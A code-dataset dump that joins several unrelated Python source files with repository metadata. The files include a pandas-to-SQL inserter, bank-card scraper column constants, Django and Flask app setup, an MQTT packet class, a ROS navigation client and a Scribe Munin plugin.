            self._logger.info('Using regular dataframe')
            if df.empty:
                self._logger.error('Empty dataframe')
                raise EmptyDataError('DataFrame is empty')
            # Column name -> dtype mapping, exposed for callers.
            self.colsAndTypes = {name: df.dtypes[name] for name in list(df.columns)}
            self._isIterable = False
        #if the df is a large file read in through chunks
        elif type(df) == pd.io.parsers.TextFileReader:
            self._logger.info('Using large dataframe')
            # Inspect only the first chunk for columns/emptiness.
            # NOTE(review): iterating a TextFileReader consumes its first
            # chunk, so a later full iteration in insertData may skip that
            # chunk -- confirm against the reader's behavior.
            for chunk in df:
                self.colsAndTypes = {name: chunk.dtypes[name] for name in list(chunk.columns)}
                if chunk.empty:
                    self._logger.error('Empty dataframe')
                    raise EmptyDataError('DataFrame is empty')
                break
            self._isIterable = True
        else:
            raise TypeError(f'Invalid df type. Type "{type(df)}" is not a DataFrame or TextFileReader')
        return True
    def _validateDbParameters(self, driver, username, password, address, port, dbName, query):
        """
        Validates database parameters by passing it into create_engine. If it succeeds, the parameters are valid
        """
        try:
            # if driver:
            #     driver = '+' + driver
            # if port:
            #     port = ':' + str(port)
            # if password:
            #     password = ':' + password
            # if address:
            #     address = '@' + address
            # URL.create assembles the connection URL from its parts.
            dbUrl = sqlalchemy.engine.URL.create(drivername=driver,
                                                 username=username,
                                                 password=password,
                                                 host=address,
                                                 port=port,
                                                 database=dbName,
                                                 query=query)
            self._engine = sqlalchemy.create_engine(dbUrl, echo=self._dbEcho)
        except Exception as e:
            # Log the failure, then re-raise so construction aborts.
            self._logger.exception(e)
            raise e
        else:
            return True
    def insertData(self):
        """
        Inserts data into the database depending on the type of DataFrame given
        """
        if self._isIterable:
            #boolean tracking if function DataFrame.to_sql has been run for any chunk
            updated = False
            for chunk in self._df:
                start = time.time()
                if not updated:
                    # First chunk honours the caller's if_exists policy.
                    chunk.to_sql(name=self._dbTableName,
                                 con=self._engine,
                                 if_exists=self._if_exists,
                                 index=self._index,
                                 index_label=self._index_label,
                                 chunksize=self._chunksize,
                                 dtype=self._dtype)
                    updated = True
                elif updated:
                    # Subsequent chunks must append to the freshly created table.
                    chunk.to_sql(name=self._dbTableName,
                                 con=self._engine,
                                 if_exists='append',
                                 index=self._index,
                                 index_label=self._index_label,
                                 chunksize=self._chunksize,
                                 dtype=self._dtype)
                end = time.time()
                self._logger.info(f'Chunk inserted in {end-start:.3f} seconds')
        elif not self._isIterable:
            start = time.time()
            self._df.to_sql(name=self._dbTableName,
                            con=self._engine,
                            if_exists=self._if_exists,
                            index=self._index,
                            index_label=self._index_label,
                            chunksize=self._chunksize,
                            dtype=self._dtype)
            end = time.time()
            self._logger.info(f'DataFrame inserted in {end-start:.3f} seconds')
    def main(self):
        # Convenience entry point: log and perform the insert.
        self._logger.info('Inserting data...')
        self.insertData()
| [
"jak11772@esri.com"
] | jak11772@esri.com |
96385bf9344820284ad1153cda420ced72c4cb9c | 11b2657afc37beeb1db9dd210ce6485491ce7bfa | /config/config_naming.py | 2d08ed06d85dafaa6cbb973f955bbaa96e429e81 | [] | no_license | lioneltayyd/malaysia-bank-card-scraping | 5299249d10e70b3fc551b62d389e0feb0aea6942 | 5729cd8428d2e21b90a2215ae5c3fd6cf1df82c5 | refs/heads/main | 2023-04-01T00:40:31.035955 | 2021-03-29T15:49:17 | 2021-03-29T15:49:17 | 352,584,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,798 | py | # -------------------------------------------------------
# Variable naming
# -------------------------------------------------------
# General metadata.
DF_URL = 'url'
DF_IMG = 'img'
DF_BANK = 'bank'
# Card metadata.
DF_CARD_NAME_ORIGINAL = 'card_name_original'
DF_CARD_NAME = 'card_name'
DF_CARD_TYPE = 'card_type'
# Card feature.
DF_CARD_FEATURE = 'card_feature_description'
DF_CARD_BENEFIT = 'card_benefit_description'
# Cashback info.
DF_CASHBACK = 'cashback'
DF_CASHBACK_CAT = 'cashback_category'
DF_CASHBACK_INFO = 'cashback_info'
DF_CASHBACK_RATE = 'cashback_rate'
DF_CASHBACK_CAP = 'cashback_cap'
DF_CASHBACK_BENCHMARK = 'cashback_benchmark'
DF_CASHBACK_FROM = 'cashback_from'
DF_CASHBACK_TILL = 'cashback_till'
DF_CASHBACK_WEEKENDS_COND = 'cashback_weekends_only'
DF_CASHBACK_MONTHLY_COND = 'cashback_monthly_basis'
DF_CASHBACK_SINGLE_RECEIPT_COND = 'cashback_single_receipt'
# Reward info.
DF_REWARD = 'reward'
DF_REWARD_CAT = 'reward_category'
DF_REWARD_INFO = 'reward_info'
DF_REWARD_POINTS = 'reward_points'
DF_EACH_SPENDING = 'each_spending'
# Travel benefit.
DF_TRAVEL_BENEFIT = 'travel_benefit'
DF_TRAVEL_BENEFIT_CAT = 'travel_benefit_category'
DF_TRAVEL_BENEFIT_INFO = 'travel_benefit_info'
# Premium info.
DF_PREMIUM = 'premium'
DF_PREMIUM_INFO = 'premium_info'
# Petrol info.
DF_PETROL = 'petrol'
DF_PETROL_INFO = 'petrol_info'
# Requirement.
DF_REQUIRED_INC = 'required_income'
DF_REQUIRED_AGE = 'required_age'
DF_REQUIRED_APPLICANT = 'required_applicant_type'
DF_REQUIRED_INC_RANGE = 'required_income_range'
DF_REQUIRED_MIN_INC = 'required_min_income'
DF_REQUIRED_MAX_INC = 'required_max_income'
DF_REQUIRED_APPLICANT = 'required_applicant'
DF_REQUIRED_AGE = 'required_age'
DF_REQUIRED_MIN_AGE = 'required_min_age'
DF_REQUIRED_MAX_AGE = 'required_max_age'
# Catalogue.
DF_CATALOGUE_CAT = 'catalogue_category'
DF_CATALOGUE_ITEM = 'item_name'
DF_CATALOGUE_CODE = 'item_code'
DF_CATALOGUE_ITEM_FILE = 'item_filename'
DF_CATALOGUE_ITEM_PTS = 'required_points'
DF_CATALOGUE_ITEM_PAR_PTS = 'required_partial_points'
DF_CATALOGUE_TILL_DATE = 'last_until_date'
# Loan metadata.
DF_LOAN_NAME_ORIGINAL = 'loan_name_original'
DF_LOAN_NAME = 'loan_name'
DF_LOAN_TYPE = 'loan_type'
# Loan info.
DF_LOAN_INFO = 'loan_info'
DF_LOAN_RANGE = 'loan_range'
DF_LOAN_MIN_AMT = 'min_loan'
DF_LOAN_MAX_AMT = 'max_loan'
DF_LOAN_MONTH_RANGE = 'month_range'
DF_LOAN_MIN_MONTH = 'min_month'
DF_LOAN_MAX_MONTH = 'max_month'
# Card cost.
DF_COST_CARD_INT_RATE = 'cost_interest_rate_annum'
DF_COST_FEE = 'cost_annual_fee'
DF_COST_FEE_COND = 'cost_annual_fee_condition'
# Penalty cost.
DF_COST_PENALTY = 'cost_late_fee_penalty'
DF_COST_LOAN_INT_RATE = 'annual_int_rate_range'
DF_COST_LOAN_MIN_INT_RATE = 'annual_min_int_rate'
DF_COST_LOAN_MAX_INT_RATE = 'annual_max_int_rate'
| [
"lionel0702@hotmail.com"
] | lionel0702@hotmail.com |
000f8ad08dc25d337b120d65451d68320ad839fc | 69ac37114be839baf66ff9982a5bc2a6c298d7ed | /pajewels/pajewels/urls.py | ea67c62786966acd9cb371f92cfe45e6833a2a10 | [] | no_license | TEENUP/petalArts | d964de176ea5a51d76c03a2e71b7e4a42b3e2aa9 | 2408666612def847a999981cb721c06b9b284b1e | refs/heads/master | 2021-01-01T15:46:35.237631 | 2017-07-19T13:35:57 | 2017-07-19T13:35:57 | 97,697,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 924 | py | """pajewels URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^customer/', include('customer.urls')),
url(r'^products/', include('products.urls')),
url(r'^transactions/', include('transactions.urls')),
url(r'^admin/', admin.site.urls),
]
| [
"puneetgupta5294@gmail.com"
] | puneetgupta5294@gmail.com |
73f787908b0cf96a1049464db035b61637d6c025 | 952230594c8062c84f603039091956c25870dda8 | /github_loader/__init__.py | bcf707abecfae5ad9b264bff3c222734e4e5f6c0 | [] | no_license | OrestOhorodnyk/github_loader | db8c076734ddc540798ea76697b6c8f85ec431a7 | 2615a2a33df60de226281d08fcb3ff27e6665d79 | refs/heads/master | 2022-12-13T21:36:58.757300 | 2019-08-21T05:30:19 | 2019-08-21T05:30:19 | 202,147,194 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | from datetime import datetime
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import create_engine, MetaData, Column, Table, Integer, DateTime, String, ForeignKey
from flask_login import LoginManager
from github_loader.config import Config, LOG_FILE_PATH
from github_loader.utils.get_logger import make_logger
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.login_view = 'users.login'
login_manager.login_message_category = 'info'
LOGGER = make_logger(LOG_FILE_PATH, 'logger')
def create_app(config_class=Config):
    """Application factory: create and configure a Flask app instance.

    Args:
        config_class: configuration object/class to load settings from
            (defaults to ``Config``).

    Returns:
        The Flask app with extensions bound and all blueprints registered.
    """
    app = Flask(__name__)
    # Bug fix: honour the config_class argument -- previously this ignored
    # the parameter and always loaded the hard-coded Config class.
    app.config.from_object(config_class)

    # Bind the module-level extension objects to this app instance.
    db.init_app(app)
    login_manager.init_app(app)

    # Imported here (not at module top) to avoid circular imports.
    from github_loader.users.routes import users
    from github_loader.repositories.routes import repositories
    from github_loader.main.routes import main
    from github_loader.errors.handlers import errors

    app.register_blueprint(users)
    app.register_blueprint(repositories)
    app.register_blueprint(main)
    app.register_blueprint(errors)

    return app
| [
"o.ohorodnyk@gmail.com"
] | o.ohorodnyk@gmail.com |
9878acf7b00e5caeb7641b7141e912a735fad17d | 1cd75217b75c6400731d35aa9d4525fb416db9ac | /fullyconnect/mqtt/disconnect.py | 7a0cd0783909f3ec9260763441451ce20dadea0f | [
"MIT"
] | permissive | VexingHanson/FullyConnect | 8002fa35665f502165fd530c3aaa83dc318b52a1 | 35e5fc1645d637242f2b7e0ccaf89a4894cbb830 | refs/heads/master | 2023-06-08T11:31:33.302954 | 2019-05-23T14:18:34 | 2019-05-23T14:18:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 752 | py | # Copyright (c) 2015 Nicolas JOUANIN
#
# See the file license.txt for copying permission.
from fullyconnect.mqtt.packet import MQTTPacket, MQTTFixedHeader, DISCONNECT
from fullyconnect.errors import fullyconnectException
class DisconnectPacket(MQTTPacket):
    """MQTT DISCONNECT packet: a fixed header only, with no variable header
    or payload."""

    VARIABLE_HEADER = None
    PAYLOAD = None

    def __init__(self, fixed: MQTTFixedHeader=None):
        # Reject a caller-supplied header of the wrong packet type up front.
        if fixed is not None and fixed.packet_type is not DISCONNECT:
            raise fullyconnectException("Invalid fixed packet type %s for DisconnectPacket init" % fixed.packet_type)
        # Fall back to a default DISCONNECT header when none was supplied.
        header = fixed if fixed is not None else MQTTFixedHeader(DISCONNECT, 0x00)
        super().__init__(header)
        self.variable_header = None
        self.payload = None
| [
"baiyongrui@icloud.com"
] | baiyongrui@icloud.com |
899b00478c14d3e13e226668bc3af9eb98d192cd | 0f5fadb3b735ff8de20f6c068a2cc52a018c5f4b | /Direcciones/migrations/0002_auto__del_field_direccion_IdSepomex__add_field_direccion_IdSepomexid.py | 09abd99a043ae6d91adba6aea509fc2c208ba8f7 | [] | no_license | NoelChaparro/Siobicx | 193c8ed92f905f46f645f5caaa82f0bea31bd608 | 0d655de3ad6d2c7e3f245ff09d4ea25deb706b7d | refs/heads/master | 2021-01-15T23:50:41.930456 | 2014-12-10T20:05:06 | 2014-12-10T20:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,185 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Direccion.IdSepomex'
db.delete_column('Direcciones', 'IdSepomex')
# Adding field 'Direccion.IdSepomexid'
db.add_column('Direcciones', 'IdSepomexid',
self.gf('django.db.models.fields.CharField')(max_length=11, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Direccion.IdSepomex'
db.add_column('Direcciones', 'IdSepomex',
self.gf('django.db.models.fields.CharField')(max_length=11, null=True, blank=True),
keep_default=False)
# Deleting field 'Direccion.IdSepomexid'
db.delete_column('Direcciones', 'IdSepomexid')
models = {
u'ConexosAgropecuarios.persona': {
'ApellidoMaterno': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'ApellidoPaterno': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'Curp': ('django.db.models.fields.CharField', [], {'max_length': '18', 'null': 'True', 'blank': 'True'}),
'Email': ('django.db.models.fields.EmailField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'EsSocio': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'EstadoCivil': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True', 'blank': 'True'}),
'FechaIngreso': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'FechaNacimiento': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'IdPersona': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'Meta': {'ordering': "('Rfc',)", 'object_name': 'Persona', 'db_table': "'Personas'"},
'PrimerNombre': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'RazonSocial': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'Rfc': ('django.db.models.fields.CharField', [], {'max_length': '13'}),
'SegundoNombre': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'Sexo': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'TipoPersona': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True'})
},
u'Direcciones.direccion': {
'Calle': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'Detalle': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'IdDireccion': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'IdSepomexid': ('django.db.models.fields.CharField', [], {'max_length': '11', 'null': 'True', 'blank': 'True'}),
'Meta': {'ordering': "('Persona',)", 'object_name': 'Direccion', 'db_table': "'Direcciones'"},
'NumeroExterior': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'NumeroInterior': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'Persona': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['ConexosAgropecuarios.Persona']"}),
'TipoDireccion': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'})
},
u'Direcciones.sepomex': {
'CCp': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'CCp'", 'blank': 'True'}),
'CCveCiudad': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'CCveCiudad'", 'blank': 'True'}),
'CEstado': ('django.db.models.fields.CharField', [], {'max_length': '2L', 'db_column': "'CEstado'", 'blank': 'True'}),
'CMnpio': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'CMnpio'", 'blank': 'True'}),
'COficina': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'COficina'", 'blank': 'True'}),
'CTipoAsenta': ('django.db.models.fields.CharField', [], {'max_length': '50L', 'db_column': "'CTipoAsenta'", 'blank': 'True'}),
'DAsenta': ('django.db.models.fields.CharField', [], {'max_length': '200L', 'db_column': "'DAsenta'", 'blank': 'True'}),
'DCiudad': ('django.db.models.fields.CharField', [], {'max_length': '200L', 'db_column': "'DCiudad'", 'blank': 'True'}),
'DCodigo': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'DCodigo'", 'blank': 'True'}),
'DCp': ('django.db.models.fields.CharField', [], {'max_length': '5L', 'db_column': "'DCp'", 'blank': 'True'}),
'DEstado': ('django.db.models.fields.CharField', [], {'max_length': '100L', 'db_column': "'DEstado'", 'blank': 'True'}),
'DMnpio': ('django.db.models.fields.CharField', [], {'max_length': '200L', 'db_column': "'DMnpio'", 'blank': 'True'}),
'DTipoAsenta': ('django.db.models.fields.CharField', [], {'max_length': '100L', 'db_column': "'DTipoAsenta'", 'blank': 'True'}),
'DZona': ('django.db.models.fields.CharField', [], {'max_length': '10L', 'db_column': "'DZona'", 'blank': 'True'}),
'IdAsentaCpCons': ('django.db.models.fields.CharField', [], {'max_length': '10L', 'db_column': "'IdAsentaCpcons'", 'blank': 'True'}),
'IdSepomex': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'IdSepomex'"}),
'Meta': {'object_name': 'Sepomex', 'db_table': "'sepomex'"}
}
}
complete_apps = ['Direcciones'] | [
"sidia.jaquez@gmail.com"
] | sidia.jaquez@gmail.com |
fc3e30dacf683b8c96d1e534d35c1596cbe0aaf7 | d523d06709f9cf8e3542e3ce063db748d9d36581 | /easy_internship_api/centers/tests.py | af4487a5ccda12d801a21c4655c67626a9b77e76 | [] | no_license | msarabi95/easy-internship-api | 5daf3307a24603e3b5f7465aa6c6d40219146e89 | cc715db84d73a0133158da9bc94a5fb7bf6ddacf | refs/heads/master | 2022-12-08T11:06:57.444330 | 2018-06-16T19:30:43 | 2018-06-16T19:30:43 | 136,828,722 | 0 | 0 | null | 2022-11-22T02:30:38 | 2018-06-10T17:10:49 | Python | UTF-8 | Python | false | false | 906 | py | from django.test import TestCase
from model_mommy import mommy
class ModelTests(TestCase):
def test_location_str(self):
location = mommy.make(
'centers.Location',
center=mommy.make('centers.Center'),
specialty=mommy.make('centers.Specialty'),
description=""
)
self.assertEqual(
str(location),
"{} @ {}".format(location.specialty.name, location.center.name),
)
location = mommy.make(
'centers.Location',
center=mommy.make('centers.Center'),
specialty=mommy.make('centers.Specialty'),
)
self.assertEqual(
str(location),
"{} @ {} ({})".format(
location.specialty.name,
location.center.name,
location.description,
),
) | [
"muhammadsaeed_express@yahoo.com"
] | muhammadsaeed_express@yahoo.com |
9b5b03a445f19ee80e1454f2b69ec50d24fc9858 | febeffe6ab6aaa33e3a92e2dbbd75783a4e32606 | /ssseg/cfgs/annnet/cfgs_voc_resnet101os8.py | c5a99a673dced76b76fc8e87509c725ef4b0e15f | [
"MIT"
] | permissive | Junjun2016/sssegmentation | 7bbc5d53abee1e0cc88d5e989e4cff5760ffcd09 | bf7281b369e8d7fc2f8986caaeec3ec38a30c313 | refs/heads/main | 2023-02-04T22:09:13.921774 | 2020-12-23T06:28:56 | 2020-12-23T06:28:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,208 | py | '''define the config file for voc and resnet101os8'''
from .base_cfg import *
# modify dataset config
DATASET_CFG = DATASET_CFG.copy()
DATASET_CFG['train'].update(
{
'type': 'voc',
'set': 'trainaug',
'rootdir': '/data/VOCdevkit/VOC2012',
}
)
DATASET_CFG['test'].update(
{
'type': 'voc',
'rootdir': '/data/VOCdevkit/VOC2012',
}
)
# modify dataloader config
DATALOADER_CFG = DATALOADER_CFG.copy()
# modify optimizer config
OPTIMIZER_CFG = OPTIMIZER_CFG.copy()
OPTIMIZER_CFG.update(
{
'max_epochs': 60,
}
)
# modify losses config
LOSSES_CFG = LOSSES_CFG.copy()
# modify model config
MODEL_CFG = MODEL_CFG.copy()
MODEL_CFG.update(
{
'num_classes': 21,
}
)
# modify common config
COMMON_CFG = COMMON_CFG.copy()
COMMON_CFG['train'].update(
{
'backupdir': 'annnet_resnet101os8_voc_train',
'logfilepath': 'annnet_resnet101os8_voc_train/train.log',
}
)
COMMON_CFG['test'].update(
{
'backupdir': 'annnet_resnet101os8_voc_test',
'logfilepath': 'annnet_resnet101os8_voc_test/test.log',
'resultsavepath': 'annnet_resnet101os8_voc_test/annnet_resnet101os8_voc_results.pkl'
}
) | [
"1159254961@qq.com"
] | 1159254961@qq.com |
e9c36fb34f7bee040f2034bbbfe143b65b8d8e9d | 8eed6883fb4dd352f29b3769b3813c996c39a583 | /locomotor/scripts/send_action.py | 8ac427f252ff5f15100aac0907887ef7967c524b | [] | no_license | mintar/robot_navigation | d1f210520ad5c07bd0fc3c30588c7ff07a88667c | 6daae350d0ec16116fa7ecddf42b036775dc7502 | refs/heads/master | 2021-07-13T04:16:11.356657 | 2020-01-08T08:22:32 | 2020-01-13T10:57:56 | 168,338,280 | 1 | 1 | null | 2020-01-13T10:09:39 | 2019-01-30T12:20:47 | C++ | UTF-8 | Python | false | false | 1,448 | py | #!/usr/bin/python
import rospy
import actionlib
import argparse
from locomotor_msgs.msg import NavigateToPoseAction, NavigateToPoseGoal
def print_feedback(feedback):
pose = feedback.state.global_pose.pose
vel = feedback.state.current_velocity.velocity
print('%.2f %.2f %.2f | %.2f %.2f' % (pose.x, pose.y, pose.theta,
vel.x, vel.theta))
print('Global plan: %d poses' % len(feedback.state.global_plan.poses))
print('%.2f %.2f %.2f' % (feedback.percent_complete,
feedback.distance_traveled,
feedback.estimated_distance_remaining))
parser = argparse.ArgumentParser()
parser.add_argument('x', nargs='?', type=float, default=0.0)
parser.add_argument('y', nargs='?', type=float, default=0.0)
parser.add_argument('theta', nargs='?', type=float, default=0.0)
parser.add_argument('-f', '--frame_id', default='map')
parser.add_argument('-n', '--namespace', default='/locomotor/')
args = parser.parse_args()
rospy.init_node('send_action', anonymous=True)
client = actionlib.SimpleActionClient(args.namespace + '/navigate', NavigateToPoseAction)
client.wait_for_server()
goal = NavigateToPoseGoal()
goal.goal.pose.x = args.x
goal.goal.pose.y = args.y
goal.goal.pose.theta = args.theta
goal.goal.header.frame_id = args.frame_id
client.send_goal(goal, feedback_cb = print_feedback)
client.wait_for_result()
print(client.get_result())
| [
"noreply@github.com"
] | mintar.noreply@github.com |
0d16c13dfc6f18cd12ea859b9915a48ccb9b5c19 | 5710f0e31b34ad655e8239ac24bb947f0c84f71c | /backend/userdb/apps.py | 050efeb6003a4e7eed050eb6161419d5f7762375 | [] | no_license | Mano-Liaoyan/DegreeOverView | 825cba0d82d827256fb08bda71affaad94780004 | d4552b50ec3c113e933d72167534e8415949681d | refs/heads/master | 2023-05-08T15:14:34.856295 | 2021-05-31T14:47:44 | 2021-05-31T14:47:44 | 364,744,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | from django.apps import AppConfig
class UserdbConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'userdb'
| [
"467226765@qq.com"
] | 467226765@qq.com |
4e0f8c2121ae38fe6f847d1ee511e07ec78c335b | 6ba4ebba2d2e5774f27b3773986144e807ccbea9 | /scribe_messages | 667059740ddb097c0da9fd62d111441182d9fd5d | [
"Apache-2.0"
] | permissive | yyuu/scribe-munin | e09a5d596de1b111ea6e78c70fdea8792ec25e25 | e3457053c65685fff4188127170ee295bbf3d420 | refs/heads/master | 2021-01-19T07:35:20.782971 | 2011-02-28T05:27:42 | 2011-02-28T05:27:42 | 1,420,271 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,839 | #!/usr/bin/env python
## Copyright (c) 2007-2008 Facebook
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
## See accompanying file LICENSE or visit the Scribe site at:
## http://developers.facebook.com/scribe/
'''scribe_counters: A simple script for running and monitoring scribe.'''
import sys
#make this work for facebook environment too
isFacebook = 0
if (isFacebook == 1):
# put your own path here!
sys.path.insert(0, '/mytrunk/fbcode-test/common/fb303/scripts')
from fb303_scripts import *
from fb303_scripts.fb303_simple_mgmt import *
else:
from fb303_scripts import *
from fb303_scripts.fb303_simple_mgmt import *
# thrift python packages need to be installed
import thrift
from thrift import protocol, transport
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
def get_counters(
port,
trans_factory = None,
prot_factory = None):
"""
get counters from standard fb303 service
@param port: service's port
@param trans_factory: TTransportFactory to use for obtaining a TTransport. Default is
TBufferedTransportFactory
@param prot_factory: TProtocolFactory to use for obtaining a TProtocol. Default is
TBinaryProtocolFactory
"""
counters = fb303_wrapper('counters', port, trans_factory, prot_factory)
return counters
port = os.environ.get('port')
if port is None:
port = 1463
counters = get_counters(port,
trans_factory = TTransport.TFramedTransportFactory(),
prot_factory = TBinaryProtocol.TBinaryProtocolFactory())
categories = set([ key[0:key.index(':')] for key in counters.keys() if not(key.startswith('scribe')) ])
if len(sys.argv) > 1:
if sys.argv[1] == 'autoconfig':
print 'yes'
sys.exit(0)
elif sys.argv[1] == 'config':
print('graph_title Scribe (port %s) messages' % (port))
print('graph_vlabel Messages per ${graph_period}')
print('graph_category Scribe')
print('graph_args --lower-limit 0')
print('graph_period second')
draw = 'AREA'
for category in categories:
print('%s_received_good.label %s:received good' % (category, category))
print('%s_received_good.type DERIVE' % (category))
print('%s_received_good.draw %s' % (category, draw))
print('%s_received_good.min 0' % (category))
draw = 'STACK'
print('scribe_overall_received_good.label scribe_overall:received good')
print('scribe_overall_received_good.type DERIVE')
print('scribe_overall_received_good.draw LINE2')
print('scribe_overall_received_good.min 0')
print('scribe_overall_sent.label scribe_overall:sent')
print('scribe_overall_sent.type DERIVE')
print('scribe_overall_sent.draw LINE2')
print('scribe_overall_sent.min 0')
sys.exit(0)
for category in categories:
print('%s_received_good.value %d' % (category, counters.get(category + ':received good', 0)))
print('scribe_overall_received_good.value %d' % (counters.get('scribe_overall:received good', 0)))
print('scribe_overall_sent.value %d' % (counters.get('scribe_overall:sent', 0)))
# vim:set ft=python :
| [
"yamashita@geishatokyo.com"
] | yamashita@geishatokyo.com | |
8002b8bd33ebd7c6508328204e0bcaba4abfe848 | c527df31f9daf06c36e8025b372d137ad9c1c4c7 | /django/call_app/admin.py | e2561d3e10d41c1a4aa4e22c0d7feb735b07ee77 | [] | no_license | Katerina964/callback | 8dc7d5d230d095ec32ce1d69c4648f4564e99f87 | 741fa58779413845ccc4e478ccc2b952c6d000a0 | refs/heads/master | 2023-03-30T17:55:08.611493 | 2021-04-13T08:53:30 | 2021-04-13T08:53:30 | 295,951,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | from django.contrib import admin
from .models import Crmaccount, Call, Customer
admin.site.register(Crmaccount)
admin.site.register(Call)
admin.site.register(Customer)
| [
"katrin.balakina@gmail.com"
] | katrin.balakina@gmail.com |
383cc4ca9311b639efa851ec502c10424169145d | e10bba262b4e8732c63ec5712124a2397f63b5f0 | /A+B.py | af1abd60d66e21182493de8ce44907fe0bcd4f2c | [] | no_license | forybh/Algorithm_py | d0d510b7dd05567838e2760de0a2e6c051d0622a | b8beba29168f0b9a88f796fa81a3679d519f007d | refs/heads/master | 2023-08-28T20:37:05.744119 | 2021-10-23T13:30:59 | 2021-10-23T13:30:59 | 326,145,951 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 3 14:45:18 2021
@author: yubyeongheon
"""
a,b = input().split()
print(int(a) + int(b)) | [
"forybh@naver.com"
] | forybh@naver.com |
7c911c573a204e4f1e15be81356f04ef1d607eb7 | 4148a916ff94ac6340330852c5876f5fb4b35c60 | /OOPS/method.py | 4a5dcea685576b90d9e2bc99e7cadba0bdb6e9ea | [] | no_license | AneelaSarikonda/PYTHON | 34e38f3fd0c4b33eb9a2eed326d4c3c30a889136 | 41fbc1dff067654b6f55601665a252bf1908e573 | refs/heads/master | 2020-09-14T13:50:06.537709 | 2019-12-17T06:08:59 | 2019-12-17T06:08:59 | 223,146,451 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 209 | py | class Student:
def __init__(var,m1,m2,m3):
var.m1=m1
var.m2=m2
var.m3=m3
def avg(s):
return (s.m1 + s.m2 + s.m3)/3
s1=Student(36,57,89)
s2=Student(46,60,27)
print(s1.avg())
print(s2.avg())
| [
"mounika1.g@gmail.com"
] | mounika1.g@gmail.com |
67afcb30651bb27c0ab62380ab348197fbbba69b | a634e3dab7e3447b7a0269f42a55392c4f3fecb9 | /app/main/urls.py | a364e5c62daca16a97ddcfae4a5c0ca9d7187e32 | [
"MIT"
] | permissive | FedeRez/webldap | cbd97f876453c31d7d67331c9feaba6ec16700ba | 175ad1443e46229edcd6483bb924917301f99333 | refs/heads/master | 2021-01-17T09:05:19.429831 | 2016-03-28T10:54:19 | 2016-03-28T10:54:19 | 9,249,058 | 13 | 4 | null | 2016-04-29T20:33:08 | 2013-04-05T19:38:25 | Python | UTF-8 | Python | false | false | 1,040 | py | from django.conf.urls import patterns, url
urlpatterns = patterns(
'main.views',
url(r'^$', 'profile'),
url(r'^edit/$', 'profile_edit'),
url(r'^login/$', 'login'),
url(r'^logout/$', 'logout'),
url(r'^passwd/$', 'passwd'),
url(r'^admin/$', 'admin'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/$', 'org'),
